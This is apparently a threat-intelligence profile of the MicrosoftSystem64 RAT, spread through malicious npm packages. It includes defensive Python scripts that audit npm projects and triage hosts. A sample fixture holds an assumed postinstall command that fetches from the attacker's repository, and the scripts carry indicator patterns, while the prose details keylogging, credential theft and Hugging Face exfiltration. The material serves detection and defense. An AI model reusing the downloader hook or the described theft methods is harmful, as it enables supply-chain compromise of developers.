MicrosoftSystem64
MicrosoftSystem64 is a cross-platform remote access trojan (RAT) delivered through malicious npm packages in a software supply-chain campaign. Reporting describes it as an 81 MB Node.js Single Executable Application (SEA) binary, deployed via poisoned packages including js-logger-pack and additional publisher/package clusters such as terminal-logger-utils, ts-logger-pack, pretty-logger-utils, and pinno-loggers. The packages carried a postinstall downloader that fetched the platform-specific MicrosoftSystem64 binary from the Hugging Face repository Lordplay/system-releases, so the payload ran as a side effect of an ordinary npm install rather than requiring any action beyond adding the dependency.
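The postinstall downloader is the part of this chain a development team can check for locally. The following is an added example, not SafeDep's, JFrog's or the campaign's own code: it walks an installed project's package-lock.json and node_modules for the package names listed above and for install-time lifecycle scripts that reference huggingface.co, the Lordplay/system-releases repository or the binary name. The sample lockfile and package.json are constructed, and the postinstall command in the sample is an assumed shape rather than the recovered one.

```python
"""Audit an installed npm project for the MicrosoftSystem64 dropper packages.

Added example, not SafeDep's or JFrog's tooling. The package names, the Hugging
Face repository and the binary name come from the reporting on this page; the
sample lockfile and package.json below are constructed for illustration, and the
postinstall URL in them is an assumed shape, not a recovered one.
"""
import json
import re
from pathlib import Path

# Package clusters named in the reporting (OSV MAL-2026-2827).
KNOWN_BAD_PACKAGES = {
    "js-logger-pack", "terminal-logger-utils", "ts-logger-pack",
    "pretty-logger-utils", "pinno-loggers",
}
# Hooks npm runs automatically during install, in execution order.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Strings a downloader for this family has to carry somewhere in its command.
DOWNLOADER_RE = re.compile(r"huggingface\.co|Lordplay/system-releases|MicrosoftSystem64", re.I)


def lockfile_hits(lock: dict) -> list[str]:
    """Installed packages (package-lock v2/v3 'packages' map) that are on the bad list."""
    hits = []
    for key, meta in lock.get("packages", {}).items():
        if not key:                       # "" is the root project itself
            continue
        # nested installs look like node_modules/a/node_modules/b; scoped ones keep "@scope/"
        name = meta.get("name") or key.rsplit("node_modules/", 1)[-1]
        if name in KNOWN_BAD_PACKAGES:
            hits.append(f"{name}@{meta.get('version', '?')}")
    return hits


def suspicious_hooks(pkg_json: dict) -> list[tuple[str, str]]:
    """(hook, command) pairs whose command references the dropper's infrastructure."""
    scripts = pkg_json.get("scripts") or {}
    return [(h, scripts[h]) for h in LIFECYCLE_HOOKS
            if h in scripts and DOWNLOADER_RE.search(scripts[h])]


def audit_project(root: Path) -> dict:
    """Check the lockfile, then every package.json under node_modules (transitive deps too)."""
    report = {"lockfile": [], "packages": {}}
    lock = root / "package-lock.json"
    if lock.is_file():
        report["lockfile"] = lockfile_hits(json.loads(lock.read_text(encoding="utf-8")))
    node_modules = root / "node_modules"
    if node_modules.is_dir():
        for pj in node_modules.rglob("package.json"):
            try:
                data = json.loads(pj.read_text(encoding="utf-8"))
            except (OSError, ValueError):
                continue
            hooks = suspicious_hooks(data)
            if data.get("name") in KNOWN_BAD_PACKAGES or hooks:
                report["packages"][data.get("name", str(pj))] = hooks
    return report


# Constructed sample data: what a poisoned install would leave behind.
SAMPLE_LOCK = {
    "name": "victim-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "victim-app", "version": "1.0.0"},
        "node_modules/express": {"version": "4.19.2"},
        "node_modules/js-logger-pack": {"version": "1.2.0"},
    },
}
SAMPLE_PKG_JSON = {
    "name": "js-logger-pack", "version": "1.2.0",
    "scripts": {
        # assumed shape of the downloader command, not the real one
        "postinstall": "node install.js https://huggingface.co/Lordplay/system-releases",
        "test": "echo ok",
    },
}

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(json.dumps(audit_project(Path(sys.argv[1])), indent=2))
    else:
        print(lockfile_hits(SAMPLE_LOCK), suspicious_hooks(SAMPLE_PKG_JSON))
```

Run it with a project directory as the argument to audit a real checkout; with no argument it evaluates the constructed sample. The hook check is deliberately broader than the name list, because the reporting shows the same downloader being republished under new package names: a lifecycle script that reaches for huggingface.co is worth a look whatever the package is called.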
The malware targets Windows, macOS, and Linux. It establishes persistence across all three platforms: on Windows via scheduled tasks and Run/registry keys, on macOS via LaunchAgents, and on Linux via systemd user services or XDG autostart entries. It sets its process title to MicrosoftSystem64 to resemble a legitimate Microsoft background service, connects to a hard-coded controller at 195.201.194.107:8010 over WebSocket and HTTP, and supports a typed task protocol with 24 remote commands. Reported capabilities include arbitrary file read/write and directory operations, recursive file scanning, deployment of additional binaries, self-update, browser session clearing, and reconnection/retry logic after interruptions.
Its collection and theft behavior is extensive. High-confidence reporting states that it targets credentials from 15 browser families, steals data from more than 80 cryptocurrency wallet extensions, hijacks Telegram Desktop sessions (tdata), copies SSH keys, logs keystrokes, monitors the clipboard, captures screenshots every 60 seconds, and scans files for secrets. It can also clear browser sessions to force reauthentication while the keylogger stays active, so that the passwords users retype are captured as keystrokes.
A notable feature is its abuse of Hugging Face for both payload delivery and exfiltration. The malware checks Hugging Face for updates, downloads binaries without signature or checksum validation, and uploads stolen data to private Hugging Face datasets controlled by the attacker. Reporting states each victim may receive separate private datasets organized by machine identity and data category, and that outbound traffic blends in as legitimate authenticated HTTPS API activity. The active exfiltration account was reported as jpeek998, created on 2026-05-15. The malware also maintained local upload state and resumed failed uploads automatically.
The campaign was documented by SafeDep and independently confirmed by JFrog. SafeDep reported live victim monitoring and recovered hundreds of screenshots from real victims as of 2026-05-28. OSV tracked the malicious npm package family as MAL-2026-2827. Attribution in the provided reporting links the operation to the North Korea-connected Contagious Interview threat group; separate social reporting also associated it with Famous Chollima/DPRK themes. The campaign specifically targeted developers through malicious open-source packages in the npm ecosystem.
Known indicators directly mentioned in the content include controller 195.201.194.107:8010, Hugging Face repository Lordplay/system-releases, exfiltration account jpeek998, and platform-specific payload names MicrosoftSystem64-win.exe, MicrosoftSystem64-darwin-x64, MicrosoftSystem64-darwin-arm64, and MicrosoftSystem64-linux. Reported hashes include SEA blob SHA-256 46b9522ba2dc757ac00a513dbd98b28babb018eae92347f2cbc3c7a5020872b5 and embedded JavaScript payload SHA-256 1c83019b52be6da9583d28fe934441a74eacef0cd7dbb9d71017122de6fe7cfc.
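Pulling the indicators above together into a host check, as an added example that is not part of the reporting or of any vendor tool: it reads the platform's user-level autostart locations (the LaunchAgent plist path given in the techniques section on macOS; the standard systemd user-unit and XDG autostart directories on Linux, which are assumed locations because the page gives no Linux file names; HKCU Run values and schtasks output on Windows), matches a process listing for the spoofed process title, and hashes files named like the payload against the two SHA-256 values. demo_findings() runs the same logic against constructed artifacts in a scratch directory so the block runs offline.

```python
"""Host triage for MicrosoftSystem64 artifacts on Windows, macOS and Linux.

Added example, not SafeDep's or JFrog's tooling. Hashes, controller address,
Hugging Face repository, exfiltration account, payload names and the macOS
LaunchAgent plist name come from the reporting on this page. The Linux systemd
user-unit and XDG autostart directories are standard locations and only assumed
to be where the Linux variant writes its entry. demo_findings() uses constructed data.
"""
import hashlib
import platform
import re
import subprocess
import tempfile
from pathlib import Path

KNOWN_SHA256 = {
    "46b9522ba2dc757ac00a513dbd98b28babb018eae92347f2cbc3c7a5020872b5",  # SEA blob
    "1c83019b52be6da9583d28fe934441a74eacef0cd7dbb9d71017122de6fe7cfc",  # embedded JS payload
}
INDICATOR_RE = re.compile(
    r"MicrosoftSystem64(?:-(?:win\.exe|darwin-x64|darwin-arm64|linux))?"
    r"|195\.201\.194\.107(?::8010)?|Lordplay/system-releases|jpeek998")
LAUNCH_AGENT = Path("Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist")


def persistence_candidates(home: Path, system: str) -> list[Path]:
    """Autostart files to read per platform; Windows is registry/task based (see below)."""
    if system == "Darwin":
        return [home / LAUNCH_AGENT]
    if system == "Linux":  # assumed locations: the page names no Linux file
        return (list((home / ".config/systemd/user").glob("*.service"))
                + list((home / ".config/autostart").glob("*.desktop")))
    return []


def scan_text(text: str) -> list[str]:
    """Distinct indicator strings found in a unit file, plist, registry value or process line."""
    return sorted({m.group(0) for m in INDICATOR_RE.finditer(text)})


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def process_hits(listing: str) -> list[str]:
    """Lines of a ps/tasklist listing that carry the spoofed process title."""
    return [ln.strip() for ln in listing.splitlines() if "MicrosoftSystem64" in ln]


def windows_autostart_hits() -> list[str]:
    """HKCU Run values and scheduled-task rows referencing the family (Windows only)."""
    import winreg
    hits, i = [], 0
    key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run")
    while True:
        try:
            name, value, _ = winreg.EnumValue(key, i)
        except OSError:
            break
        if scan_text(f"{name} {value}"):
            hits.append(f"Run\\{name} = {value}")
        i += 1
    tasks = subprocess.run(["schtasks", "/query", "/fo", "csv", "/v"], capture_output=True, text=True).stdout
    hits += [f"task: {ln}" for ln in tasks.splitlines() if scan_text(ln)]
    return hits


def triage(home: Path, system: str, listing: str, hash_roots: list[Path]) -> dict:
    """Persistence files, process titles and on-disk hashes, collected into one findings dict."""
    findings = {"persistence": [], "process": process_hits(listing), "hash": []}
    for p in persistence_candidates(home, system):
        if p.is_file():
            iocs = scan_text(p.read_text(errors="replace"))
            if iocs or p.name == LAUNCH_AGENT.name:   # the plist name alone is an indicator
                findings["persistence"].append((str(p), iocs))
    for root in hash_roots:                            # only hash files already named like the payload
        for f in root.rglob("MicrosoftSystem64*"):
            if f.is_file() and sha256_of(f) in KNOWN_SHA256:
                findings["hash"].append(str(f))
    return findings


def demo_findings() -> dict:
    """Run triage against constructed artifacts in a scratch home directory."""
    with tempfile.TemporaryDirectory() as d:
        home = Path(d)
        unit_dir = home / ".config/systemd/user"
        unit_dir.mkdir(parents=True)
        (unit_dir / "update-helper.service").write_text(      # constructed unit name and body
            "[Service]\nExecStart=%h/.cache/MicrosoftSystem64-linux\n"
            "[Install]\nWantedBy=default.target\n")
        listing = "  PID COMMAND\n  412 systemd\n 9090 MicrosoftSystem64\n"  # constructed ps output
        return triage(home, "Linux", listing, [home])


if __name__ == "__main__":
    system, home = platform.system(), Path.home()
    ps_cmd = ["tasklist", "/fo", "csv"] if system == "Windows" else ["ps", "-axo", "pid,comm"]
    listing = subprocess.run(ps_cmd, capture_output=True, text=True).stdout
    print(triage(home, system, listing, [home, Path(tempfile.gettempdir())]))
    if system == "Windows":
        print(windows_autostart_hits())
```

Hashing is restricted to files already named like the payload because walking a whole home directory and hashing everything is slow and the filenames are reported; if the operator renames the binary, the process-title and autostart checks still fire. Network indicators (the 195.201.194.107:8010 WebSocket/HTTP controller and authenticated traffic to huggingface.co) belong in egress logs rather than on the host, since the exfiltration is indistinguishable from legitimate Hugging Face API use at the connection level.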
Groups observed using it
2 distinct threat actors attributed by public researchers (see the attribution paragraph above).
"Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace" published by SafeDep.
A newly discovered malware called MicrosoftSystem64 has been quietly stealing data from infected computers by routing stolen files through HuggingFace... Once a developer installs the package, it silently downloads and executes MicrosoftSystem64... The malware is a remote access trojan with sweeping capabilities.
Techniques & procedures
32 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Malicious npm packages delivering an 81 MB Node.js SEA binary (SafeDep, "Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace").
Execution
6 techniques
Once a developer installs the package, it silently downloads and executes MicrosoftSystem64, an 81 MB binary that runs on Windows, Linux, and macOS without needing any separate software pre-installed.
The malicious logic lives entirely inside the injected JavaScript bundle.
Windows: compiles C# in-memory via PowerShell Add-Type to install a SetWindowsHookEx low-level keyboard hook, with UI Automation-based password-field detection.
Once installed, the malware digs in using the native persistence tools of each platform: scheduled tasks and registry keys on Windows, LaunchAgents on macOS, and systemd services with autostart entries on Linux.
Persistence
7 techniques
Baseline automatic behavior includes: persisting via scheduled task / Run key (Windows), LaunchAgent (macOS), or systemd user unit / XDG autostart (Linux)
macOS LaunchAgent persistence path: ~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist
Privilege Escalation
7 techniques
The same autostart mechanisms listed under Persistence (scheduled task / Run key on Windows, LaunchAgent on macOS, systemd user unit / XDG autostart on Linux); ATT&CK maps scheduled-task and boot/logon-autostart techniques to both tactics.
Stealth
2 techniques
The malware disguises itself as a legitimate Microsoft process... It labels its own process as MicrosoftSystem64 in system listings, closely mimicking the appearance of a genuine Microsoft background service.
clear_sessions: kills browser processes and destroys session/credential stores
Credential Access
4 techniques
It targets credentials from 15 browser families... runs a continuous keylogger, and takes screenshots every 60 seconds.
This RAT steals browser credentials, 80+ crypto wallet extensions, Telegram sessions...
Discovery
3 techniques
Baseline automatic behavior includes: beaconing system info to the hard-coded controller
The capability list is explicit in the extracted bundle: ping, get_system_info, list_drives, list_dir
scan_files: recursive credential, wallet, browser, shell-history, and environment-variable scanning
Collection
6 techniques
The operator can read or write any user-accessible file.
The malware persists on Windows, macOS, and Linux, beacons to a hard-coded controller, logs keystrokes, monitors the clipboard
It targets credentials from 15 browser families, lifts data from over 80 cryptocurrency wallet extensions, hijacks Telegram Desktop sessions, copies SSH keys, runs a continuous keylogger, and takes screenshots every 60 seconds.
It then: archives the requested file or folder into a gzip file under the system temp directory
Command and Control
3 techniques
This means all outbound traffic looks like normal, authenticated HTTPS requests to a well-known AI platform... The malware reconnects to its command server over WebSocket after any interruption
Once a developer installs the package, it silently downloads and executes MicrosoftSystem64... The malware also pulls updates from HuggingFace every 24 hours, replacing its own binary when a newer version is available.
Exfiltration
2 techniques
Upload of stolen data to attacker-controlled private Hugging Face datasets, as documented in the SafeDep write-up "Inside MicrosoftSystem64: A Supply Chain RAT Exfiltrating to HuggingFace".
Other
1 technique
IOCs tracked for this family
19 indicators attributed across vendor reports, sandbox runs, and researcher write-ups: IPs, domains, and DNS infrastructure linked to this family; file hashes (MD5, SHA-1, SHA-256) from samples and reports; and other indicator types observed in public reporting. The values reproduced on this page are those listed in the summary above.
Recent activity
5 sources tracked across advisories, community write-ups, and news.
Cross-platform remote access trojan delivered via poisoned npm packages that steals browser credentials, cryptocurrency wallet data, Telegram Desktop sessions, SSH keys, keystrokes, and screenshots; persists across Windows, Linux, and macOS; uses HuggingFace for binary hosting, self-updates, and exfiltration; and supports remote command execution.
A remote access trojan referenced in the context of a supply chain campaign, described as exfiltrating data to HuggingFace.
A supply-chain remote access trojan delivered via malicious npm packages. It is described as a Node.js SEA binary that steals browser credentials, cryptocurrency wallet extension data, and Telegram sessions, and exfiltrates data to HuggingFace.
A remote access trojan delivered via malicious npm packages as an 81 MB Node.js SEA binary. It is described as stealing browser credentials, data from more than 80 crypto wallet extensions, and Telegram sessions, and exfiltrating data to HuggingFace.